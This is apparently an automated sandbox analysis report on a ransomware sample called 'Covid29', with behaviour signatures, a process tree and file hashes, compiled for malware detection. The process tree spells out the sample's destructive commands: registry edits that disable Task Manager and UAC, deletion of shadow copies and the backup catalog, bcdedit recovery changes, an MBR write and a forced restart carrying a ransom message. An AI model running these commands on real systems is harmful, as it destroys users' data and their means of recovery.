Analysis

  • max time kernel
    76s
  • max time network
    83s
  • platform
    windows11-21h2_x64
  • resource
    win11-20250314-en
  • resource tags

    arch:x64arch:x86image:win11-20250314-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    04/04/2025, 15:09

General

Malware Config

Signatures

  • Chaos

    Ransomware family first seen in June 2021.

  • Chaos Ransomware 4 IoCs
  • Chaos family
  • UAC bypass 3 TTPs 2 IoCs
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • Deletes backup catalog 3 TTPs 1 IoCs

    Uses wbadmin.exe to inhibit system recovery.

  • Disables Task Manager via registry modification
  • Drops startup file 3 IoCs
  • Executes dropped EXE 4 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Drops desktop.ini file(s) 34 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Windows directory 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 16 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Checks SCSI registry key(s) 3 TTPs 4 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Interacts with shadow copies 3 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 1 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 3 IoCs
  • Modifies registry key 1 TTPs 7 IoCs
  • NTFS ADS 1 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 45 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 33 IoCs
  • Suspicious use of SendNotifyMessage 12 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument http://edge.com
    1⤵
    • Drops file in Windows directory
    • Enumerates system info in registry
    • Modifies data under HKEY_USERS
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:3224
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffac925dcf8,0x7ffac925dd04,0x7ffac925dd10
      2⤵
        PID:4872
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1944,i,10448102239650231056,15459002865345162654,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=1924 /prefetch:2
        2⤵
          PID:5116
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=2204,i,10448102239650231056,15459002865345162654,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=2216 /prefetch:11
          2⤵
            PID:4692
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2344,i,10448102239650231056,15459002865345162654,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=2488 /prefetch:13
            2⤵
              PID:2320
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3000,i,10448102239650231056,15459002865345162654,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=3160 /prefetch:1
              2⤵
                PID:1104
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3004,i,10448102239650231056,15459002865345162654,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=3180 /prefetch:1
                2⤵
                  PID:2440
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4148,i,10448102239650231056,15459002865345162654,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=4172 /prefetch:9
                  2⤵
                    PID:2328
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4580,i,10448102239650231056,15459002865345162654,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=4556 /prefetch:1
                    2⤵
                      PID:4288
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5092,i,10448102239650231056,15459002865345162654,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=5100 /prefetch:14
                      2⤵
                        PID:4660
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=5488,i,10448102239650231056,15459002865345162654,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=5344 /prefetch:1
                        2⤵
                          PID:5436
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=3248,i,10448102239650231056,15459002865345162654,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=3164 /prefetch:14
                          2⤵
                            PID:2832
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=3204,i,10448102239650231056,15459002865345162654,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=3300 /prefetch:14
                            2⤵
                              PID:3556
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=2648,i,10448102239650231056,15459002865345162654,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=3752 /prefetch:14
                              2⤵
                                PID:3784
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=4140,i,10448102239650231056,15459002865345162654,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=4180 /prefetch:1
                                2⤵
                                  PID:2616
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5364,i,10448102239650231056,15459002865345162654,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=5388 /prefetch:14
                                  2⤵
                                  • NTFS ADS
                                  PID:3308
                              • C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
                                "C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
                                1⤵
                                  PID:1700
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                                  1⤵
                                    PID:2556
                                  • C:\Windows\System32\rundll32.exe
                                    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                    1⤵
                                      PID:2272
                                    • C:\Users\Admin\AppData\Local\Temp\Temp1_Covid29 Ransomware.zip\TrojanRansomCovid29.exe
                                      "C:\Users\Admin\AppData\Local\Temp\Temp1_Covid29 Ransomware.zip\TrojanRansomCovid29.exe"
                                      1⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:4972
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\4755.tmp\TrojanRansomCovid29.bat" "
                                        2⤵
                                        • System Location Discovery: System Language Discovery
                                        • Modifies registry class
                                        PID:2268
                                        • C:\Windows\SysWOW64\WScript.exe
                                          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\4755.tmp\fakeerror.vbs"
                                          3⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:4000
                                        • C:\Windows\SysWOW64\PING.EXE
                                          ping localhost -n 2
                                          3⤵
                                          • System Location Discovery: System Language Discovery
                                          • System Network Configuration Discovery: Internet Connection Discovery
                                          • Runs ping.exe
                                          PID:5944
                                        • C:\Windows\SysWOW64\reg.exe
                                          reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                                          3⤵
                                          • System Location Discovery: System Language Discovery
                                          • Modifies registry key
                                          PID:1708
                                        • C:\Windows\SysWOW64\reg.exe
                                          reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f
                                          3⤵
                                          • System Location Discovery: System Language Discovery
                                          • Modifies registry key
                                          PID:5200
                                        • C:\Windows\SysWOW64\reg.exe
                                          reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
                                          3⤵
                                          • System Location Discovery: System Language Discovery
                                          • Modifies registry key
                                          PID:2756
                                        • C:\Windows\SysWOW64\reg.exe
                                          reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
                                          3⤵
                                          • System Location Discovery: System Language Discovery
                                          • Modifies registry key
                                          PID:856
                                        • C:\Windows\SysWOW64\reg.exe
                                          reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f
                                          3⤵
                                          • System Location Discovery: System Language Discovery
                                          • Modifies registry key
                                          PID:2400
                                        • C:\Windows\SysWOW64\reg.exe
                                          reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f
                                          3⤵
                                          • UAC bypass
                                          • System Location Discovery: System Language Discovery
                                          • Modifies registry key
                                          PID:832
                                        • C:\Windows\SysWOW64\reg.exe
                                          reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                          3⤵
                                          • UAC bypass
                                          • System Location Discovery: System Language Discovery
                                          • Modifies registry key
                                          PID:3432
                                        • C:\Users\Admin\AppData\Local\Temp\4755.tmp\mbr.exe
                                          mbr.exe
                                          3⤵
                                          • Executes dropped EXE
                                          • Writes to the Master Boot Record (MBR)
                                          • System Location Discovery: System Language Discovery
                                          PID:3452
                                        • C:\Users\Admin\AppData\Local\Temp\4755.tmp\Cov29Cry.exe
                                          Cov29Cry.exe
                                          3⤵
                                          • Executes dropped EXE
                                          • Suspicious behavior: EnumeratesProcesses
                                          PID:1252
                                          • C:\Users\Admin\AppData\Roaming\svchost.exe
                                            "C:\Users\Admin\AppData\Roaming\svchost.exe"
                                            4⤵
                                            • Drops startup file
                                            • Executes dropped EXE
                                            • Drops desktop.ini file(s)
                                            • Sets desktop wallpaper using registry
                                            • Modifies registry class
                                            • Suspicious behavior: AddClipboardFormatListener
                                            • Suspicious behavior: EnumeratesProcesses
                                            PID:2972
                                            • C:\Windows\System32\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete
                                              5⤵
                                                PID:1204
                                                • C:\Windows\system32\vssadmin.exe
                                                  vssadmin delete shadows /all /quiet
                                                  6⤵
                                                  • Interacts with shadow copies
                                                  PID:3832
                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                  wmic shadowcopy delete
                                                  6⤵
                                                    PID:896
                                                • C:\Windows\System32\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
                                                  5⤵
                                                    PID:1020
                                                    • C:\Windows\system32\bcdedit.exe
                                                      bcdedit /set {default} bootstatuspolicy ignoreallfailures
                                                      6⤵
                                                      • Modifies boot configuration data using bcdedit
                                                      PID:5448
                                                    • C:\Windows\system32\bcdedit.exe
                                                      bcdedit /set {default} recoveryenabled no
                                                      6⤵
                                                      • Modifies boot configuration data using bcdedit
                                                      PID:2880
                                                  • C:\Windows\System32\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet
                                                    5⤵
                                                      PID:5640
                                                      • C:\Windows\system32\wbadmin.exe
                                                        wbadmin delete catalog -quiet
                                                        6⤵
                                                        • Deletes backup catalog
                                                        PID:1548
                                                    • C:\Windows\system32\NOTEPAD.EXE
                                                      "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\covid29-is-here.txt
                                                      5⤵
                                                        PID:4840
                                                  • C:\Windows\SysWOW64\shutdown.exe
                                                    shutdown /r /t 300 /c "5 minutes to pay until you lose your data and system forever"
                                                    3⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:1756
                                                  • C:\Windows\SysWOW64\PING.EXE
                                                    ping localhost -n 9
                                                    3⤵
                                                    • System Location Discovery: System Language Discovery
                                                    • System Network Configuration Discovery: Internet Connection Discovery
                                                    • Runs ping.exe
                                                    PID:3116
                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                    taskkill /f /im explorer.exe
                                                    3⤵
                                                    • System Location Discovery: System Language Discovery
                                                    • Kills process with taskkill
                                                    PID:2100
                                                  • C:\Users\Admin\AppData\Local\Temp\4755.tmp\Cov29LockScreen.exe
                                                    Cov29LockScreen.exe
                                                    3⤵
                                                    • Executes dropped EXE
                                                    • System Location Discovery: System Language Discovery
                                                    • Suspicious use of SetWindowsHookEx
                                                    PID:5808
                                              • C:\Windows\System32\PickerHost.exe
                                                C:\Windows\System32\PickerHost.exe -Embedding
                                                1⤵
                                                • Suspicious use of SetWindowsHookEx
                                                PID:3212
                                              • C:\Windows\system32\vssvc.exe
                                                C:\Windows\system32\vssvc.exe
                                                1⤵
                                                  PID:4048
                                                • C:\Windows\system32\wbengine.exe
                                                  "C:\Windows\system32\wbengine.exe"
                                                  1⤵
                                                    PID:944
                                                  • C:\Windows\System32\vdsldr.exe
                                                    C:\Windows\System32\vdsldr.exe -Embedding
                                                    1⤵
                                                      PID:2084
                                                    • C:\Windows\System32\vds.exe
                                                      C:\Windows\System32\vds.exe
                                                      1⤵
                                                      • Checks SCSI registry key(s)
                                                      PID:5060

                                                    Network

                                                    MITRE ATT&CK Enterprise v15

                                                    Replay Monitor

                                                    Loading Replay Monitor...

                                                    Downloads

                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\6ef5b12a-7eb2-46fd-bd4f-c67b8ed92aab.tmp

                                                      Filesize

                                                      15KB

                                                      MD5

                                                      0c4ee74392bcb9c2651fb89da5d6ea38

                                                      SHA1

                                                      3b0c059f0763113bc1f02ff5dcbc7ab421b9bb30

                                                      SHA256

                                                      271186f51c93e49b8e397d63570f77ed64355ad873c825457f56c4be696da869

                                                      SHA512

                                                      0c69717b1882b08f112a904faf5b582497a6ba83dceeb00e15c8522c1557dc55e25ee27713984c27e49a24c9d84606c6cb4edd41168ee16587e07a3402257080

                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

                                                      Filesize

                                                      649B

                                                      MD5

                                                      af19a6ca40123408ae55d94c21be3a71

                                                      SHA1

                                                      acea4ad6acbeda2e954807ae9417adac15cae7bd

                                                      SHA256

                                                      ab7980192c81820d31b633173549af272eeef8852584f99680470ffa76c0e498

                                                      SHA512

                                                      7cb9b9027f6841c0e10525be0111d354f57181f6973bae901ecb5c273db46d40f65241002e5a61830589edf24756c532426ec73db457a4aef627728da2f99b81

                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                      Filesize

                                                      2KB

                                                      MD5

                                                      02f669446ac88aa72bd5075cd0c916a6

                                                      SHA1

                                                      690075b8f1b207a8998bc68cd01cfd2dcd6c3a93

                                                      SHA256

                                                      f742d485844c765112a8be63006cdfb53249d61fdc7ba8009e873d5cce418f1f

                                                      SHA512

                                                      dd9b30ad8296e42c858da698909356fdc0c835d67582a44603b4c3ce6ecdd42adca22bf0977807f22b4471545e735af99e375ee289d33a03db5dc3dc2fde483f

                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

                                                      Filesize

                                                      4KB

                                                      MD5

                                                      1a1b679910cc3139dccf2cf3b1dcdb4d

                                                      SHA1

                                                      53b3d31ca3ca0fca20ae4dcb1471fd5c76ce99ed

                                                      SHA256

                                                      551fbe353156dc9a444b77c328f99a36e67a0a1caed23c0ff5a14d6cc7a109bf

                                                      SHA512

                                                      64797d63377e8349456fce9fcc44ac95a2a91a62bcc52dbc05143248da02bb26585aeb19b885511e6c9e58035f999a41daf8039f63a69bbfaa5325376ba17bd9

                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

                                                      Filesize

                                                      2B

                                                      MD5

                                                      d751713988987e9331980363e24189ce

                                                      SHA1

                                                      97d170e1550eee4afc0af065b78cda302a97674c

                                                      SHA256

                                                      4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                                      SHA512

                                                      b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                      Filesize

                                                      12KB

                                                      MD5

                                                      5dc70b973c07fbdafbdb2c8349d585b7

                                                      SHA1

                                                      e2458f2500069012e325e2b42d7f5b4ec202ac63

                                                      SHA256

                                                      85e396c657513e840d23dacef30e3449d4ca34d84827413aafd3a7d1f1b3fd69

                                                      SHA512

                                                      78ff767fa8a9297ffb81e9a02c628c8153b76f9b8bd8a2a67ca1280a8f6e2d84ba7f576e6abba845175e0eeb64c285019c6449b0b14b378de493b29307591882

                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                      Filesize

                                                      12KB

                                                      MD5

                                                      c66a38b480fb8dfa976a989060d8414b

                                                      SHA1

                                                      7c8a5a53297e9526be1653e0ed9793ab66f5e45b

                                                      SHA256

                                                      887c2755e3bcf139f8eaf418ec78c2b6cdb83e0eee5f813e734605651cdeaaa8

                                                      SHA512

                                                      5cc480542b49cd3fc6a92ee0a9992fb757496ac6436aecc26684362adee1d23b45ba59e924f7cad7284f281fbd0a04a798d6ba5f36922f377f4df0ac9cec2456

                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                      Filesize

                                                      11KB

                                                      MD5

                                                      7417d4a0410d243bc46e806920855733

                                                      SHA1

                                                      499521cacf2bfaf86470016110433141d4753d3d

                                                      SHA256

                                                      890be0e31e5bec16b8321417e7598fa320f33d2db4b37fd6d73af26d4cc6956a

                                                      SHA512

                                                      cf94d83069da16f79f6bd70ee07fbb2d52cf8a988530ee612bc4fda93a857c64e3985aadcb1d14f976e4197707e38bcbf582eb8f9868b6e003739ef85a1995a8

                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                      Filesize

                                                      12KB

                                                      MD5

                                                      66df371970828f0bb4492098df6982fe

                                                      SHA1

                                                      8fc244e08b04cdce2309e6348c841a932c5b0eea

                                                      SHA256

                                                      03ab76c7069a0cafc6ae5c65dae0b23179b76daa2284c7fb492907748c9ffd3f

                                                      SHA512

                                                      27f96498485ab4462387cbf25c925e6c3ca0fa7c17c43091b968a36b3fda88dca18f923f2f9e669604c4de04ffe340802bc82b64cc96c192e8d23afe47b52aef

                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                      Filesize

                                                      11KB

                                                      MD5

                                                      9765761e01b75347480c79e8602c5771

                                                      SHA1

                                                      1579a722ba5d6eae49308d4624e54b9e3fdbfef7

                                                      SHA256

                                                      5393e238aa7997a50a8534d57aa63a32c118145770ab5300621d59bb1c91dab4

                                                      SHA512

                                                      67ef619eea2bf3d8e3af14b4cd34d1217ad6bbabbd0fc6958976bc02639cd1c077b71001b65bed84aad50a0a5228edb30b492636f78cf889084ca35832aa86f4

                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

                                                      Filesize

                                                      72B

                                                      MD5

                                                      055535dadb90186ac904361abbcd06df

                                                      SHA1

                                                      ca2951f89e8f454310aa91baf9539f6c28f9f0ce

                                                      SHA256

                                                      65edd043803e158bfad05dcddb2ebb0181f1111e33c5d151048782825efc2711

                                                      SHA512

                                                      3a4fa213b5849b79935ebcd403a956b8421fe41c2253b95087e11f8263cc9fd0beb55e12b0d9991175d8b665c76583d2f4854438568fe21cd76087a80848bafb

                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe57da14.TMP

                                                      Filesize

                                                      48B

                                                      MD5

                                                      d5f99f1fe64b004b13c831936f4125ab

                                                      SHA1

                                                      748ccfd17ce78bbf54e699440c8e1b99adc5831c

                                                      SHA256

                                                      54c496e536e46b9b26ac913a21bb0212b8fab590becd90392530a0620a9ea02a

                                                      SHA512

                                                      6b625ecf03f2199318f60868a66e21b298756b9dc5abc2e640ce6654ea5d95f862ae4cefc7940f44498540d54c8292bf42da4585039bafbfac2e889e55c82fba

                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                                      Filesize

                                                      81KB

                                                      MD5

                                                      0552cdee34113bf1ecd23816672abd5a

                                                      SHA1

                                                      6333cd30adc20b8d79d1ffde095122af7d668402

                                                      SHA256

                                                      acc347e5dfe9ecc7ced325d59854da0bfb083ddadd783c5b5189cc86ca70a445

                                                      SHA512

                                                      15a71742a0d1966f1ebc618f5fb72f1a24eef66e87e586a557a89b8f64521ce03313a9225c9f3c95a4cea169511f547d8e6a4638927969221440eba0faab384c

                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                                      Filesize

                                                      80KB

                                                      MD5

                                                      b8e2228cfacc9c197afc310ba929b13f

                                                      SHA1

                                                      a3e12b192cb38012642a36d95d60b6e1a4e5c18f

                                                      SHA256

                                                      74508dc8c186fd91def4f992b88383aac8b1ac31180a506aff0383a6e2a05433

                                                      SHA512

                                                      3cd9bd20e2520abcf715fd92a939838c9da3dfddf49e350faa263eb459c829582baa931b6fa4cfa6a3718045efcf42758929740f866217f1e4c6052befe63c16

                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                                      Filesize

                                                      81KB

                                                      MD5

                                                      d2c2b24102d48effd33f2794b5b136e9

                                                      SHA1

                                                      4dadce1d82ab6e562ae84d24d152a2de6b8f9967

                                                      SHA256

                                                      ac25dcb772d2e1d3dfc003243ec80a57e7d618fbd8a3a66d1db8706e56d8e411

                                                      SHA512

                                                      4c903060a6366ac0cb4fd6d31862cb5126bbb3a8d6491a8de5a3bd705ded163ed0bd9e40a4f6780c64392276899000d5a81990d9f55b9ff16f3c935c97c873de

                                                    • C:\Users\Admin\AppData\Local\Temp\4755.tmp\Cov29Cry.exe.death

                                                      Filesize

                                                      103KB

                                                      MD5

                                                      8bcd083e16af6c15e14520d5a0bd7e6a

                                                      SHA1

                                                      c4d2f35d1fdb295db887f31bbc9237ac9263d782

                                                      SHA256

                                                      b4f78ff66dc3f5f8ddd694166e6b596d533830792f9b5f1634d3f5f17d6a884a

                                                      SHA512

                                                      35999577be0626b50eeab65b493d48af2ab42b699f7241d2780647bf7d72069216d99f5f708337a109e79b9c9229613b8341f44c6d96245fd1f3ac9f05814d6a

                                                    • C:\Users\Admin\AppData\Local\Temp\4755.tmp\Cov29LockScreen.exe

                                                      Filesize

                                                      48KB

                                                      MD5

                                                      f724c6da46dc54e6737db821f9b62d77

                                                      SHA1

                                                      e35d5587326c61f4d7abd75f2f0fc1251b961977

                                                      SHA256

                                                      6cde4a9f109ae5473703c4f5962f43024d71d2138cbd889223283e7b71e5911c

                                                      SHA512

                                                      6f83dd7821828771a9cae34881c611522f6b5a567f5832f9e4b9b4b59bf495f40ad78678bd86cba59d32ea8644b4aa5f052552774fea142b9d6da625b55b6afc

                                                    • C:\Users\Admin\AppData\Local\Temp\4755.tmp\TrojanRansomCovid29.bat

                                                      Filesize

                                                      1KB

                                                      MD5

                                                      57f0432c8e31d4ff4da7962db27ef4e8

                                                      SHA1

                                                      d5023b3123c0b7fae683588ac0480cd2731a0c5e

                                                      SHA256

                                                      b82e64e533789c639d8e193b78e06fc028ea227f55d7568865120be080179afc

                                                      SHA512

                                                      bc082486503a95f8e2ce7689d31423386a03054c5e8e20e61250ca7b7a701e98489f5932eba4837e05ec935057f18633798a10f6f84573a95fcf086ee7cabcbf

                                                    • C:\Users\Admin\AppData\Local\Temp\4755.tmp\fakeerror.vbs

                                                      Filesize

                                                      144B

                                                      MD5

                                                      c0437fe3a53e181c5e904f2d13431718

                                                      SHA1

                                                      44f9547e7259a7fb4fe718e42e499371aa188ab6

                                                      SHA256

                                                      f2571f03eb9d5ee4dca29a8fec1317ded02973c5dd233d582f56cebe98544f22

                                                      SHA512

                                                      a6b488fc74dc69fc4227f92a06deb297d19cd54b0e07659f9c9a76ce15d1ef1d8fa4d607acdd03d30d3e2be2a0f59503e27fc95f03f3006e137fa2f92825e7e3

                                                    • C:\Users\Admin\AppData\Local\Temp\4755.tmp\mbr.exe.danger

